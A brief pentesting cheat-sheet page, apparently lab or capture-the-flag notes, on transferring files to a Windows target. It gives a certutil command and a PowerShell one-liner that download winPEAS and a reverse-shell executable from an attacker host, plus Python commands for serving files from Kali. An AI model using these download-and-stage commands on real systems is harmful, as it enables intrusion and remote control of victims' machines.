Windows
Certutil.exe
certutil.exe -urlcache -split -f http://10.10.14.36:8000/winPEASany.exe winpeas.exeDownload file with Powershell
powershell -c "Invoke-WebRequest -Uri 'http://$IP:9000/revshell.exe' -OutFile 'c:\tmp\revshell.exe'"Hosting HTTP web server with Kali
python -m SimpleHTTPServer 80 python3 -m http.server 80Last updated